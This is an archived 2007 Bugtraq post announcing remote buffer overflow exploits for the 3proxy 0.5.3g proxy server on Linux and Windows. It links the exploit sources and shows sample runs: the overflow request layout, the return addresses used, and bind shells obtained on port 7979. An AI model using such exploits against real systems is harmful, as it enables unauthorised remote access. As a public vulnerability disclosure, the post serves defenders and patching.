[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.58.0704292300420.9707@localhost>
Date: Sun, 29 Apr 2007 23:06:41 -0400 (EDT)
From: v9 <v9@...ehalo.us>
To: bugtraq@...urityfocus.com
Subject: 3proxy[v0.5.3g]: (linux/win32 service) remote buffer overflow
exploits.
just for fun...
original exploit references:
http://fakehalo.us/x3proxy-win32.c
http://fakehalo.us/x3proxy.c
example(win32 service):
-------------------------------------------------------------------------
[v9@...lo v9]$ gcc x3proxy-win32.c -o x3proxy-win32
[v9@...lo v9]$ ./x3proxy-win32 -h desktop.fakehalo.lan
[*] 3proxy[v0.5.3g]: (win32 service) remote buffer overflow exploit.
[*] by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)
[*] target: desktop.fakehalo.lan:3128
[*] return address($eip/"CALL ESP"): 0x7c81518b
[*] attempting to connect: desktop.fakehalo.lan:3128.
[*] successfully connected: desktop.fakehalo.lan:3128.
[*] sending string:
[+] GET /[FILLERx1064][EIP/"CALL ESP"][NOPSx32][SHELLCODE]\n
[+] Host: [FILLERx999]\n\n
[*] closing connection.
[*] attempting to connect: desktop.fakehalo.lan:7979.
[*] successfully connected: desktop.fakehalo.lan:7979.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
example(linux):
-------------------------------------------------------------------------
[v9@...lo v9]$ gcc x3proxy.c -o x3proxy
[v9@...lo v9]$ ./x3proxy -h XXXXXXX.net -r 0x0805333c
[*] 3proxy[v0.5.3g]: (linux) remote buffer overflow exploit.
[*] by: vade79/v9 v9@...ehalo.us (fakehalo/realhalo)
[*] target : XXXXXXX.net:3128
[*] shellcode type : bindshell(port=7979)
[*] return address($eip) : 0x0805333c(+0=0x0805333c)
[*] attempting to connect: XXXXXXX.net:3128.
[*] successfully connected: XXXXXXX.net:3128.
[*] sending string: "GET /[NOPS][SHELLCODE][RETADDR]\nHost: [FILLER]\n\n"
[*] closing connection.
[*] attempting to connect: XXXXXXX.net:7979.
[*] successfully connected: XXXXXXX.net:7979.
Linux XXXXXXX.net 2.6.18-gentoo-r2 #1 Sun Nov 12 11:31:19 PST 2006 i686
Intel(R) Pentium(R) 4 CPU 1300MHz GenuineIntel GNU/Linux
uid=515(v9) gid=572(v9) groups=572(v9)
Powered by blists - more mailing lists